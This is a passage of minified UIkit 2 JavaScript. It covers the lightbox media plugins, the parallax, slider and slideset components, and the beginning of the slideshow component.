i.component("lightbox",{defaults:{allowfullscreen:!0,duration:400,group:!1,keyboard:!0},index:0,items:!1,boot:function(){i.$html.on("click","[data-uk-lightbox]",function(t){t.preventDefault();var e=i.$(this);e.data("lightbox")||i.lightbox(e,i.Utils.options(e.attr("data-uk-lightbox"))),e.data("lightbox").show(e)}),i.$doc.on("keyup",function(i){if(e&&e.is(":visible")&&e.lightbox.options.keyboard)switch(i.preventDefault(),i.keyCode){case 37:e.lightbox.previous();break;case 39:e.lightbox.next()}})},init:function(){var t=[];if(this.index=0,this.siblings=[],this.element&&this.element.length){var e=this.options.group?i.$('[data-uk-lightbox*="'+this.options.group+'"]'):this.element;e.each(function(){var e=i.$(this);t.push({source:e.attr("href"),title:e.attr("data-title")||e.attr("title"),type:e.attr("data-lightbox-type")||"auto",link:e})}),this.index=e.index(this.element),this.siblings=t}else this.options.group&&this.options.group.length&&(this.siblings=this.options.group);this.trigger("lightbox-init",[this])},show:function(e){this.modal=t(this),this.modal.dialog.stop(),this.modal.content.stop();var o,n,s=this,h=i.$.Deferred();e=e||0,"object"==typeof e&&this.siblings.forEach(function(i,t){e[0]===i.link[0]&&(e=t)}),0>e?e=this.siblings.length-e:this.siblings[e]||(e=0),n=this.siblings[e],o={lightbox:s,source:n.source,type:n.type,index:e,promise:h,title:n.title,item:n,meta:{content:"",width:null,height:null}},this.index=e,this.modal.content.empty(),this.modal.is(":visible")||(this.modal.content.css({width:"",height:""}).empty(),this.modal.modal.show()),this.modal.loader.removeClass("uk-hidden"),h.promise().done(function(){s.data=o,s.fitSize(o)}).fail(function(){o.meta.content='<div class="uk-position-cover uk-flex uk-flex-middle uk-flex-center"><strong>Loading resource failed!</strong></div>',o.meta.width=400,o.meta.height=300,s.data=o,s.fitSize(o)}),s.trigger("showitem.uk.lightbox",[o])},fitSize:function(){var t=this,e=this.data,o=this.modal.dialog.outerWidth()-this.modal.dialog.width(),n=parseInt(this.modal.dialog.css("margin-top"),10),s=parseInt(this.modal.dialog.css("margin-bottom"),10),h=n+s,a=e.meta.content,l=t.options.duration;this.siblings.length>1&&(a=[a,'<a href="#" class="uk-slidenav uk-slidenav-contrast uk-slidenav-previous uk-hidden-touch" data-lightbox-previous></a>','<a href="#" class="uk-slidenav uk-slidenav-contrast uk-slidenav-next uk-hidden-touch" data-lightbox-next></a>'].join(""));var d,r,u=i.$("<div>&nbsp;</div>").css({opacity:0,position:"absolute",top:0,left:0,width:"100%",maxWidth:t.modal.dialog.css("max-width"),padding:t.modal.dialog.css("padding"),margin:t.modal.dialog.css("margin")}),c=e.meta.width,g=e.meta.height;u.appendTo("body").width(),d=u.width(),r=window.innerHeight-h,u.remove(),this.modal.dialog.find(".uk-modal-caption").remove(),e.title&&(this.modal.dialog.append('<div class="uk-modal-caption">'+e.title+"</div>"),r-=this.modal.dialog.find(".uk-modal-caption").outerHeight()),d<e.meta.width&&(g=Math.floor(g*(d/c)),c=d),g>r&&(g=Math.floor(r),c=Math.ceil(e.meta.width*(r/e.meta.height))),this.modal.content.css("opacity",0).width(c).html(a),"iframe"==e.type&&this.modal.content.find("iframe:first").height(g);var m=g+o,p=Math.floor(window.innerHeight/2-m/2)-h;0>p&&(p=0),this.modal.closer.addClass("uk-hidden"),t.modal.data("mwidth")==c&&t.modal.data("mheight")==g&&(l=0),this.modal.dialog.animate({width:c+o,height:g+o,top:p},l,"swing",function(){t.modal.loader.addClass("uk-hidden"),t.modal.content.css({width:""}).animate({opacity:1},function(){t.modal.closer.removeClass("uk-hidden")}),t.modal.data({mwidth:c,mheight:g})})},next:function(){this.show(this.siblings[this.index+1]?this.index+1:0)},previous:function(){this.show(this.siblings[this.index-1]?this.index-1:this.siblings.length-1)}}),i.plugin("lightbox","image",{init:function(i){i.on("showitem.uk.lightbox",function(i,t){if("image"==t.type||t.source&&t.source.match(/\.(jpg|jpeg|png|gif|svg)$/i)){var e=function(i,e,o){t.meta={content:'<img class="uk-responsive-width" width="'+e+'" height="'+o+'" src ="'+i+'">',width:e,height:o},t.type="image",t.promise.resolve()};if(o[t.source])e(t.source,o[t.source].width,o[t.source].height);else{var n=new Image;n.onerror=function(){t.promise.reject("Loading image failed")},n.onload=function(){o[t.source]={width:n.width,height:n.height},e(t.source,o[t.source].width,o[t.source].height)},n.src=t.source}}})}}),i.plugin("lightbox","youtube",{init:function(i){var t=/(\/\/.*?youtube\.[a-z]+)\/watch\?v=([^&]+)&?(.*)/,n=/youtu\.be\/(.*)/;i.on("showitem.uk.lightbox",function(i,s){var h,a,l=function(i,t,o){s.meta={content:'<iframe src="//www.youtube.com/embed/'+i+'" width="'+t+'" height="'+o+'" style="max-width:100%;"'+(e.lightbox.options.allowfullscreen?" allowfullscreen":"")+"></iframe>",width:t,height:o},s.type="iframe",s.promise.resolve()};if((a=s.source.match(t))&&(h=a[2]),(a=s.source.match(n))&&(h=a[1]),h){if(o[h])l(h,o[h].width,o[h].height);else{var d=new Image,r=!1;d.onerror=function(){o[h]={width:640,height:320},l(h,o[h].width,o[h].height)},d.onload=function(){120==d.width&&90==d.height?r?(o[h]={width:640,height:320},l(h,o[h].width,o[h].height)):(r=!0,d.src="//img.youtube.com/vi/"+h+"/0.jpg"):(o[h]={width:d.width,height:d.height},l(h,d.width,d.height))},d.src="//img.youtube.com/vi/"+h+"/maxresdefault.jpg"}i.stopImmediatePropagation()}})}}),i.plugin("lightbox","vimeo",{init:function(t){var n,s=/(\/\/.*?)vimeo\.[a-z]+\/([0-9]+).*?/;t.on("showitem.uk.lightbox",function(t,h){var a,l=function(i,t,o){h.meta={content:'<iframe src="//player.vimeo.com/video/'+i+'" width="'+t+'" height="'+o+'" style="width:100%;box-sizing:border-box;"'+(e.lightbox.options.allowfullscreen?" allowfullscreen":"")+"></iframe>",width:t,height:o},h.type="iframe",h.promise.resolve()};(n=h.source.match(s))&&(a=n[2],o[a]?l(a,o[a].width,o[a].height):i.$.ajax({type:"GET",url:"//vimeo.com/api/oembed.json?url="+encodeURI(h.source),jsonp:"callback",dataType:"jsonp",success:function(i){o[a]={width:i.width,height:i.height},l(a,o[a].width,o[a].height)}}),t.stopImmediatePropagation())})}}),i.plugin("lightbox","video",{init:function(t){t.on("showitem.uk.lightbox",function(t,e){var n=function(i,t,o){e.meta={content:'<video class="uk-responsive-width" src="'+i+'" width="'+t+'" height="'+o+'" controls></video>',width:t,height:o},e.type="video",e.promise.resolve()};if("video"==e.type||e.source.match(/\.(mp4|webm|ogv)$/i))if(o[e.source])n(e.source,o[e.source].width,o[e.source].height);else var s=i.$('<video style="position:fixed;visibility:hidden;top:-10000px;"></video>').attr("src",e.source).appendTo("body"),h=setInterval(function(){s[0].videoWidth&&(clearInterval(h),o[e.source]={width:s[0].videoWidth,height:s[0].videoHeight},n(e.source,o[e.source].width,o[e.source].height),s.remove())},20)})}}),i.plugin("lightbox","iframe",{init:function(i){i.on("showitem.uk.lightbox",function(t,o){var n=function(i,t,n){o.meta={content:'<iframe class="uk-responsive-width" src="'+i+'" width="'+t+'" height="'+n+'"'+(e.lightbox.options.allowfullscreen?" allowfullscreen":"")+"></iframe>",width:t,height:n},o.type="iframe",o.promise.resolve()};("iframe"===o.type||o.source.match(/\.(html|php)$/))&&n(o.source,i.options.width||800,i.options.height||600)})}}),i.lightbox.create=function(t,e){if(t){var o,n=[];return t.forEach(function(t){n.push(i.$.extend({source:"",title:"",type:"auto",link:!1},"string"==typeof t?{source:t}:t))}),o=i.lightbox(i.$.extend({},e,{group:n}))}},i.lightbox});

/*! Parallax */
!function(e){var t;window.UIkit2&&(t=e(UIkit2)),"function"==typeof define&&define.amd&&define("uikit-parallax",["uikit"],function(){return t||e(UIkit2)})}(function(e){"use strict";function t(t,a,r){var i,n,s,o,c,l,p,f=new Image;return n=t.element.css({backgroundSize:"cover",backgroundRepeat:"no-repeat"}),i=n.css("background-image").replace(/^url\(/g,"").replace(/\)$/g,"").replace(/("|')/g,""),o=function(){var e=n.innerWidth(),i=n.innerHeight(),o="bg"==a?r.diff:r.diff/100*i;return i+=o,e+=Math.ceil(o*c),e-o<s.w&&i<s.h?t.element.css({backgroundSize:"auto"}):(i>e/c?(l=Math.ceil(i*c),p=i,i>window.innerHeight&&(l=1.2*l,p=1.2*p)):(l=e,p=Math.ceil(e/c)),n.css({backgroundSize:l+"px "+p+"px"}).data("bgsize",{w:l,h:p}),void 0)},f.onerror=function(){},f.onload=function(){s={w:f.width,h:f.height},c=f.width/f.height,e.$win.on("load resize orientationchange",e.Utils.debounce(function(){o()},50)),o()},f.src=i,!0}function a(e,t,a){return e=i(e),t=i(t),a=a||0,r(e,t,a)}function r(e,t,a){var r="rgba("+parseInt(e[0]+a*(t[0]-e[0]),10)+","+parseInt(e[1]+a*(t[1]-e[1]),10)+","+parseInt(e[2]+a*(t[2]-e[2]),10)+","+(e&&t?parseFloat(e[3]+a*(t[3]-e[3])):1);return r+=")"}function i(e){var t,a;return a=(t=/#([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})/.exec(e))?[parseInt(t[1],16),parseInt(t[2],16),parseInt(t[3],16),1]:(t=/#([0-9a-fA-F])([0-9a-fA-F])([0-9a-fA-F])/.exec(e))?[17*parseInt(t[1],16),17*parseInt(t[2],16),17*parseInt(t[3],16),1]:(t=/rgb\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*\)/.exec(e))?[parseInt(t[1]),parseInt(t[2]),parseInt(t[3]),1]:(t=/rgba\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9\.]*)\s*\)/.exec(e))?[parseInt(t[1],10),parseInt(t[2],10),parseInt(t[3],10),parseFloat(t[4])]:p[e]||[255,255,255,0]}var n=[],s=!1,o=0,c=window.innerHeight,l=function(){o=e.$win.scrollTop(),window.requestAnimationFrame(function(){for(var e=0;e<n.length;e++)n[e].process()})};e.component("parallax",{defaults:{velocity:.5,target:!1,viewport:!1,media:!1},boot:function(){s=function(){var e,t=document.createElement("div"),a={WebkitTransform:"-webkit-transform",MSTransform:"-ms-transform",MozTransform:"-moz-transform",Transform:"transform"};document.body.insertBefore(t,null);for(var r in a)void 0!==t.style[r]&&(t.style[r]="translate3d(1px,1px,1px)",e=window.getComputedStyle(t).getPropertyValue(a[r]));return document.body.removeChild(t),void 0!==e&&e.length>0&&"none"!==e}(),e.$doc.on("scrolling.uk.document",l),e.$win.on("load resize orientationchange",e.Utils.debounce(function(){c=window.innerHeight,l()},50)),e.ready(function(t){e.$("[data-uk-parallax]",t).each(function(){var t=e.$(this);t.data("parallax")||e.parallax(t,e.Utils.options(t.attr("data-uk-parallax")))})})},init:function(){this.base=this.options.target?e.$(this.options.target):this.element,this.props={},this.velocity=this.options.velocity||1;var t=["target","velocity","viewport","plugins","media"];Object.keys(this.options).forEach(function(e){if(-1===t.indexOf(e)){var a,r,i,n,s=String(this.options[e]).split(",");e.match(/color/i)?(a=s[1]?s[0]:this._getStartValue(e),r=s[1]?s[1]:s[0],a||(a="rgba(255,255,255,0)")):(a=parseFloat(s[1]?s[0]:this._getStartValue(e)),r=parseFloat(s[1]?s[1]:s[0]),n=r>a?r-a:a-r,i=r>a?1:-1),this.props[e]={start:a,end:r,dir:i,diff:n}}}.bind(this)),n.push(this)},process:function(){if(this.options.media)switch(typeof this.options.media){case"number":if(window.innerWidth<this.options.media)return!1;break;case"string":if(window.matchMedia&&!window.matchMedia(this.options.media).matches)return!1}var e=this.percentageInViewport();this.options.viewport!==!1&&(e=0===this.options.viewport?1:e/this.options.viewport),this.update(e)},percentageInViewport:function(){var e,t,a,r=this.base.offset().top,i=this.base.outerHeight();return r>o+c?a=0:o>r+i?a=1:c>r+i?a=(c>o?o:o-c)/(r+i):(e=o+c-r,t=Math.round(e/((c+i)/100)),a=t/100),a},update:function(e){var r,i,n={transform:"",filter:""},o=e*(1-(this.velocity-this.velocity*e));0>o&&(o=0),o>1&&(o=1),(void 0===this._percent||this._percent!=o)&&(Object.keys(this.props).forEach(function(c){switch(r=this.props[c],0===e?i=r.start:1===e?i=r.end:void 0!==r.diff&&(i=r.start+r.diff*o*r.dir),"bg"!=c&&"bgp"!=c||this._bgcover||(this._bgcover=t(this,c,r)),c){case"x":n.transform+=s?" translate3d("+i+"px, 0, 0)":" translateX("+i+"px)";break;case"xp":n.transform+=s?" translate3d("+i+"%, 0, 0)":" translateX("+i+"%)";break;case"y":n.transform+=s?" translate3d(0, "+i+"px, 0)":" translateY("+i+"px)";break;case"yp":n.transform+=s?" translate3d(0, "+i+"%, 0)":" translateY("+i+"%)";break;case"rotate":n.transform+=" rotate("+i+"deg)";break;case"scale":n.transform+=" scale("+i+")";break;case"bg":n["background-position"]="50% "+i+"px";break;case"bgp":n["background-position"]="50% "+i+"%";break;case"color":case"background-color":case"border-color":n[c]=a(r.start,r.end,o);break;case"blur":n.filter+=" blur("+i+"px)";break;case"hue":n.filter+=" hue-rotate("+i+"deg)";break;case"grayscale":n.filter+=" grayscale("+i+"%)";break;case"invert":n.filter+=" invert("+i+"%)";break;case"fopacity":n.filter+=" opacity("+i+"%)";break;case"saturate":n.filter+=" saturate("+i+"%)";break;case"sepia":n.filter+=" sepia("+i+"%)";break;default:n[c]=i}}.bind(this)),n.filter&&(n["-webkit-filter"]=n.filter),this.element.css(n),this._percent=o)},_getStartValue:function(e){var t=0;switch(e){case"scale":t=1;break;default:t=this.element.css(e)}return t||0}});var p={black:[0,0,0,1],blue:[0,0,255,1],brown:[165,42,42,1],cyan:[0,255,255,1],fuchsia:[255,0,255,1],gold:[255,215,0,1],green:[0,128,0,1],indigo:[75,0,130,1],khaki:[240,230,140,1],lime:[0,255,0,1],magenta:[255,0,255,1],maroon:[128,0,0,1],navy:[0,0,128,1],olive:[128,128,0,1],orange:[255,165,0,1],pink:[255,192,203,1],purple:[128,0,128,1],violet:[128,0,128,1],red:[255,0,0,1],silver:[192,192,192,1],white:[255,255,255,1],yellow:[255,255,0,1],transparent:[255,255,255,0]};return e.parallax});

/*! Slider */
!function(t){var e;window.UIkit2&&(e=t(UIkit2)),"function"==typeof define&&define.amd&&define("uikit-slider",["uikit"],function(){return e||t(UIkit2)})}(function(t){"use strict";var e,i,s,n,a={};return t.component("slider",{defaults:{center:!1,threshold:10,infinite:!0,autoplay:!1,autoplayInterval:7e3,pauseOnHover:!0,activecls:"uk-active"},boot:function(){t.ready(function(e){setTimeout(function(){t.$("[data-uk-slider]",e).each(function(){var e=t.$(this);e.data("slider")||t.slider(e,t.Utils.options(e.attr("data-uk-slider")))})},0)})},init:function(){var o=this;this.container=this.element.find(".uk-slider"),this.focus=0,t.$win.on("resize load",t.Utils.debounce(function(){o.update(!0)},100)),this.on("click.uk.slider","[data-uk-slider-item]",function(e){e.preventDefault();var i=t.$(this).attr("data-uk-slider-item");if(o.focus!=i)switch(o.stop(),i){case"next":case"previous":o["next"==i?"next":"previous"]();break;default:o.updateFocus(parseInt(i,10))}}),this.container.on({"touchstart mousedown":function(h){h.originalEvent&&h.originalEvent.touches&&(h=h.originalEvent.touches[0]),h.button&&2==h.button||!o.active||(o.stop(),s=t.$(h.target).is("a")?t.$(h.target):t.$(h.target).parents("a:first"),n=!1,s.length&&s.one("click",function(t){n&&t.preventDefault()}),i=function(t){n=!0,e=o,a={touchx:parseInt(t.pageX,10),dir:1,focus:o.focus,base:o.options.center?"center":"area"},t.originalEvent&&t.originalEvent.touches&&(t=t.originalEvent.touches[0]),e.element.data({"pointer-start":{x:parseInt(t.pageX,10),y:parseInt(t.pageY,10)},"pointer-pos-start":o.pos}),o.container.addClass("uk-drag"),i=!1},i.x=parseInt(h.pageX,10),i.threshold=o.options.threshold)},mouseenter:function(){o.options.pauseOnHover&&(o.hovering=!0)},mouseleave:function(){o.hovering=!1}}),this.update(!0),this.on("display.uk.check",function(){o.element.is(":visible")&&o.update(!0)}),this.element.find("a,img").attr("draggable","false"),this.options.autoplay&&this.start(),t.domObserve(this.element,function(){o.element.children(":not([data-slider-slide])").length&&o.update(!0)})},update:function(e){var i,s,n,a,o=this,h=0,r=0;return this.items=this.container.children().filter(":visible"),this.vp=this.element[0].getBoundingClientRect().width,this.container.css({"min-width":"","min-height":""}),this.items.each(function(e){i=t.$(this).attr("data-slider-slide",e),a=i.css({left:"",width:""})[0].getBoundingClientRect(),s=a.width,n=i.width(),r=Math.max(r,a.height),i.css({left:h,width:s}).data({idx:e,left:h,width:s,cwidth:n,area:h+s,center:h-(o.vp/2-n/2)}),h+=s}),this.container.css({"min-width":h,"min-height":r}),this.options.infinite&&(h<=2*this.vp||this.items.length<5)&&!this.itemsResized?(this.container.children().each(function(t){o.container.append(o.items.eq(t).clone(!0).attr("id",""))}).each(function(t){o.container.append(o.items.eq(t).clone(!0).attr("id",""))}),this.itemsResized=!0,this.update()):(this.cw=h,this.pos=0,this.active=h>=this.vp,this.container.css({"-ms-transform":"","-webkit-transform":"",transform:""}),e&&this.updateFocus(this.focus),void 0)},updatePos:function(t){this.pos=t,this.container.css({"-ms-transform":"translateX("+t+"px)","-webkit-transform":"translateX("+t+"px)",transform:"translateX("+t+"px)"})},updateFocus:function(e,i){if(this.active){i=i||(e>this.focus?1:-1);var s,n,a=this.items.eq(e);if(this.options.infinite&&this.infinite(e,i),this.options.center)this.updatePos(-1*a.data("center")),this.items.filter("."+this.options.activecls).removeClass(this.options.activecls),a.addClass(this.options.activecls);else if(this.options.infinite)this.updatePos(-1*a.data("left"));else{for(s=0,n=e;n<this.items.length;n++)s+=this.items.eq(n).data("width");if(s>this.vp)this.updatePos(-1*a.data("left"));else if(1==i){for(s=0,n=this.items.length-1;n>=0;n--){if(s+=this.items.eq(n).data("width"),s==this.vp){e=n;break}if(s>this.vp){e=n<this.items.length-1?n+1:n;break}}s>this.vp?this.updatePos(-1*(this.container.width()-this.vp)):this.updatePos(-1*this.items.eq(e).data("left"))}}var o=this.items.eq(e).data("left");this.items.removeClass("uk-slide-before uk-slide-after").each(function(i){i!==e&&t.$(this).addClass(t.$(this).data("left")<o?"uk-slide-before":"uk-slide-after")}),this.focus=e,this.trigger("focusitem.uk.slider",[e,this.items.eq(e),this])}},next:function(){var t=this.items[this.focus+1]?this.focus+1:this.options.infinite?0:this.focus;this.updateFocus(t,1)},previous:function(){var t=this.items[this.focus-1]?this.focus-1:this.options.infinite?this.items[this.focus-1]?this.items-1:this.items.length-1:this.focus;this.updateFocus(t,-1)},start:function(){this.stop();var t=this;this.interval=setInterval(function(){t.hovering||t.next()},this.options.autoplayInterval)},stop:function(){this.interval&&clearInterval(this.interval)},infinite:function(t,e){var i,s=this,n=this.items.eq(t),a=t,o=[],h=0;if(1==e){for(i=0;i<this.items.length&&(a!=t&&(h+=this.items.eq(a).data("width"),o.push(this.items.eq(a))),!(h>this.vp));i++)a=a+1==this.items.length?0:a+1;o.length&&o.forEach(function(t){var e=n.data("area");t.css({left:e}).data({left:e,area:e+t.data("width"),center:e-(s.vp/2-t.data("cwidth")/2)}),n=t})}else{for(i=this.items.length-1;i>-1&&(h+=this.items.eq(a).data("width"),a!=t&&o.push(this.items.eq(a)),!(h>this.vp));i--)a=a-1==-1?this.items.length-1:a-1;o.length&&o.forEach(function(t){var e=n.data("left")-t.data("width");t.css({left:e}).data({left:e,area:e+t.data("width"),center:e-(s.vp/2-t.data("cwidth")/2)}),n=t})}}}),t.$doc.on("mousemove.uk.slider touchmove.uk.slider",function(t){if(t.originalEvent&&t.originalEvent.touches&&(t=t.originalEvent.touches[0]),i&&Math.abs(t.pageX-i.x)>i.threshold&&(window.getSelection().toString()?e=i=!1:i(t)),e){var s,n,o,h,r,c,d,u,f,l;if(t.clientX||t.clientY?s=t.clientX:(t.pageX||t.pageY)&&(s=t.pageX-document.body.scrollLeft-document.documentElement.scrollLeft),r=a.focus,n=s-e.element.data("pointer-start").x,o=e.element.data("pointer-pos-start")+n,h=s>e.element.data("pointer-start").x?-1:1,c=e.items.eq(a.focus),1==h)for(d=c.data("left")+Math.abs(n),u=0,f=a.focus;u<e.items.length;u++){if(l=e.items.eq(f),f!=a.focus&&l.data("left")<d&&l.data("area")>d){r=f;break}f=f+1==e.items.length?0:f+1}else for(d=c.data("left")-Math.abs(n),u=0,f=a.focus;u<e.items.length;u++){if(l=e.items.eq(f),f!=a.focus&&l.data("area")<=c.data("left")&&l.data("center")<d){r=f;break}f=f-1==-1?e.items.length-1:f-1}e.options.infinite&&r!=a._focus&&e.infinite(r,h),e.updatePos(o),a.dir=h,a._focus=r,a.touchx=parseInt(t.pageX,10),a.diff=d}}),t.$doc.on("mouseup.uk.slider touchend.uk.slider",function(){if(e){e.container.removeClass("uk-drag"),e.items.eq(a.focus);var t,s,n,o=!1;if(1==a.dir){for(s=0,n=a.focus;s<e.items.length;s++){if(t=e.items.eq(n),n!=a.focus&&t.data("left")>a.diff){o=n;break}n=n+1==e.items.length?0:n+1}e.options.infinite||o||(o=e.items.length)}else{for(s=0,n=a.focus;s<e.items.length;s++){if(t=e.items.eq(n),n!=a.focus&&t.data("left")<a.diff){o=n;break}n=n-1==-1?e.items.length-1:n-1}e.options.infinite||o||(o=0)}e.updateFocus(o!==!1?o:a._focus)}e=i=!1}),t.slider});

/*! Slideset */
!function(t){var i;window.UIkit2&&(i=t(UIkit2)),"function"==typeof define&&define.amd&&define("uikit-slideset",["uikit"],function(){return i||t(UIkit2)})}(function(t){"use strict";function i(i,e,n,s){var a,o,r,l,h=t.$.Deferred(),u=this.options.delay===!1?Math.floor(this.options.duration/2):this.options.delay,d=this;if(s=s||1,this.element.css("min-height",this.element.height()),n[0]===e[0])return h.resolve(),h.promise();if("object"==typeof i?(a=i[0],o=i[1]||i[0]):(a=i,o=a),t.$body.css("overflow-x","hidden"),r=function(){if(e&&e.length&&e.hide().removeClass(o+" uk-animation-reverse").css({opacity:"","animation-delay":"",animation:""}),!n.length)return h.resolve(),void 0;for(l=0;l<n.length;l++)n.eq(1==s?l:n.length-l-1).css("animation-delay",l*u+"ms");var i=function(){n.removeClass(""+a).css({opacity:"",display:"","animation-delay":"",animation:""}),h.resolve(),t.$body.css("overflow-x",""),d.element.css("min-height",""),i=!1};n.addClass(a)[1==s?"last":"first"]().one(t.support.animation.end,function(){i&&i()}).end().css("display",""),setTimeout(function(){i&&i()},n.length*u*2)},n.length&&n.css("animation-duration",this.options.duration+"ms"),e&&e.length)for(e.css("animation-duration",this.options.duration+"ms")[1==s?"last":"first"]().one(t.support.animation.end,function(){r()}),l=0;l<e.length;l++)!function(i,e){setTimeout(function(){e.css("display","none").css("display","").css("opacity",0).on(t.support.animation.end,function(){e.removeClass(o)}).addClass(o+" uk-animation-reverse")}.bind(this),l*u)}(l,e.eq(1==s?l:e.length-l-1));else r();return h.promise()}function e(t,i){var e,n=0,s=-1,a=t.length||0,o=[];if(1>i)return null;for(;a>n;)e=n%i,e?o[s][e]=t[n]:o[++s]=[t[n]],n++;for(n=0,a=o.length;a>n;)o[n]=jQuery(o[n]),n++;return o}var n;t.component("slideset",{defaults:{"default":1,animation:"fade",duration:200,filter:"",delay:!1,controls:!1,autoplay:!1,autoplayInterval:7e3,pauseOnHover:!0},sets:[],boot:function(){t.ready(function(i){t.$("[data-uk-slideset]",i).each(function(){var i=t.$(this);i.data("slideset")||t.slideset(i,t.Utils.options(i.attr("data-uk-slideset")))})})},init:function(){var i=this;this.activeSet=!1,this.list=this.element.find(".uk-slideset"),this.nav=this.element.find(".uk-slideset-nav"),this.controls=this.options.controls?t.$(this.options.controls):this.element,t.$win.on("resize load",t.Utils.debounce(function(){i.update()},100)),i.list.addClass("uk-grid-width-1-"+i.options.default),["xlarge","large","medium","small"].forEach(function(t){i.options[t]&&i.list.addClass("uk-grid-width-"+t+"-1-"+i.options[t])}),this.on("click.uk.slideset","[data-uk-slideset-item]",function(e){if(e.preventDefault(),!i.animating){var n=t.$(this).attr("data-uk-slideset-item");if(i.activeSet!==n)switch(n){case"next":case"previous":i["next"==n?"next":"previous"]();break;default:i.show(parseInt(n,10))}}}),this.controls.on("click.uk.slideset","[data-uk-filter]",function(e){var n=t.$(this);n.parent().hasClass("uk-slideset")||(e.preventDefault(),i.animating||i.currentFilter==n.attr("data-uk-filter")||(i.updateFilter(n.attr("data-uk-filter")),i._hide().then(function(){i.update(!0,!0)})))}),this.on("swipeRight swipeLeft",function(t){i["swipeLeft"==t.type?"next":"previous"]()}),this.updateFilter(this.options.filter),this.update(),this.element.on({mouseenter:function(){i.options.pauseOnHover&&(i.hovering=!0)},mouseleave:function(){i.hovering=!1}}),this.options.autoplay&&this.start(),t.domObserve(this.list,function(){i.list.children(":visible:not(.uk-active)").length&&i.update(!1,!0)})},update:function(t,i){var n,s=this.visible;if(this.visible=this.getVisibleOnCurrenBreakpoint(),s!=this.visible||i){for(this.children=this.list.children().hide(),this.items=this.getItems(),this.sets=e(this.items,this.visible),n=0;n<this.sets.length;n++)this.sets[n].css({display:"none"});if(this.nav.length&&this.nav.empty()){for(n=0;n<this.sets.length;n++)this.nav.append('<li data-uk-slideset-item="'+n+'"><a></a></li>');this.nav[1==this.nav.children().length?"addClass":"removeClass"]("uk-invisible")}this.activeSet=!1,this.show(0,!t)}},updateFilter:function(i){var e,n=this;this.currentFilter=i,this.controls.find("[data-uk-filter]").each(function(){e=t.$(this),e.parent().hasClass("uk-slideset")||(e.attr("data-uk-filter")==n.currentFilter?e.addClass("uk-active"):e.removeClass("uk-active"))})},getVisibleOnCurrenBreakpoint:function(){var i=null,e=t.$('<div style="position:absolute;height:1px;top:-1000px;width:100px"><div></div></div>').appendTo("body"),n=e.children().eq(0),s=this.options;return["xlarge","large","medium","small"].forEach(function(t){s[t]&&!i&&(e.attr("class","uk-grid-width-"+t+"-1-2").width(),50==n.width()&&(i=t))}),e.remove(),this.options[i]||this.options["default"]},getItems:function(){var i,e=[];return this.currentFilter?(i=this.currentFilter||[],"string"==typeof i&&(i=i.split(/,/).map(function(t){return t.trim()})),this.children.each(function(){var n=t.$(this),s=n.attr("data-uk-filter"),a=i.length?!1:!0;s&&(s=s.split(/,/).map(function(t){return t.trim()}),i.forEach(function(t){s.indexOf(t)>-1&&(a=!0)})),a&&e.push(n[0])}),e=t.$(e)):e=this.list.children(),e},show:function(i,e,s){var a=this;if(this.activeSet!==i&&!this.animating){s=s||(i<this.activeSet?-1:1);var o=this.sets[this.activeSet]||[],r=this.sets[i],l=this._getAnimation();(e||!t.support.animation)&&(l=n.none),this.animating=!0,this.nav.length&&this.nav.children().removeClass("uk-active").eq(i).addClass("uk-active"),l.apply(a,[o,r,s]).then(function(){t.Utils.checkDisplay(r,!0),a.children.hide().removeClass("uk-active"),r.addClass("uk-active").css({display:"",opacity:""}),a.animating=!1,a.activeSet=i,t.Utils.checkDisplay(r,!0),a.trigger("show.uk.slideset",[r])})}},_getAnimation:function(){var i=n[this.options.animation]||n.none;return t.support.animation||(i=n.none),i},_hide:function(){var t=this,i=this.sets[this.activeSet]||[],e=this._getAnimation();return this.animating=!0,e.apply(t,[i,[],1]).then(function(){t.animating=!1})},next:function(){this.show(this.sets[this.activeSet+1]?this.activeSet+1:0,!1,1)},previous:function(){this.show(this.sets[this.activeSet-1]?this.activeSet-1:this.sets.length-1,!1,-1)},start:function(){this.stop();var t=this;this.interval=setInterval(function(){t.hovering||t.animating||t.next()},this.options.autoplayInterval)},stop:function(){this.interval&&clearInterval(this.interval)}}),n={none:function(){var i=t.$.Deferred();return i.resolve(),i.promise()},fade:function(t,e){return i.apply(this,["uk-animation-fade",t,e])},"slide-bottom":function(t,e){return i.apply(this,["uk-animation-slide-bottom",t,e])},"slide-top":function(t,e){return i.apply(this,["uk-animation-slide-top",t,e])},"slide-vertical":function(t,e,n){var s=["uk-animation-slide-top","uk-animation-slide-bottom"];return-1==n&&s.reverse(),i.apply(this,[s,t,e])},"slide-horizontal":function(t,e,n){var s=["uk-animation-slide-right","uk-animation-slide-left"];return-1==n&&s.reverse(),i.apply(this,[s,t,e,n])},scale:function(t,e){return i.apply(this,["uk-animation-scale-up",t,e])}},t.slideset.animations=n});

/*! Slideshow */
!function(i){var t;window.UIkit2&&(t=i(UIkit2)),"function"==typeof define&&define.amd&&define("uikit-slideshow",["uikit"],function(){return t||i(UIkit2)})}(function(i){"use strict";var t,s=0;i.component("slideshow",{defaults:{animation:"fade",duration:500,height:"auto",start:0,autoplay:!1,autoplayInterval:7e3,videoautoplay:!0,videomute:!0,slices:15,pauseOnHover:!0,kenburns:!1,kenburnsanimations:["uk-animation-middle-left","uk-animation-top-right","uk-animation-bottom-left","uk-animation-top-center","","uk-animation-bottom-right"]},current:!1,interval:null,hovering:!1,boot:function(){i.ready(function(t){i.$("[data-uk-slideshow]",t).each(function(){var t=i.$(this);t.data("slideshow")||i.slideshow(t,i.Utils.options(t.attr("data-uk-slideshow")))})})},init:function(){var t=this;this.container=this.element.hasClass("uk-slideshow")?this.element:i.$(this.find(".uk-slideshow:first")),this.current=this.options.start,this.animating=!1,this.fixFullscreen=navigator.userAgent.match(/(iPad|iPhone|iPod)/g)&&this.container.hasClass("uk-slideshow-fullscreen"),this.options.kenburns&&(this.kbanimduration=this.options.kenburns===!0?"15s":this.options.kenburns,String(this.kbanimduration).match(/(ms|s)$/)||(this.kbanimduration+="ms"),"string"==typeof this.options.kenburnsanimations&&(this.options.kenburnsanimations=this.options.kenburnsanimations.split(","))),this.update(),this.on("click.uk.slideshow","[data-uk-slideshow-item]",function(s){s.preventDefault();var e=i.$(this).attr("data-uk-slideshow-item");if(t.current!=e){switch(e){case"next":case"previous":t["next"==e?"next":"previous"]();break;default:t.show(parseInt(e,10))}t.stop()}}),i.$win.on("resize 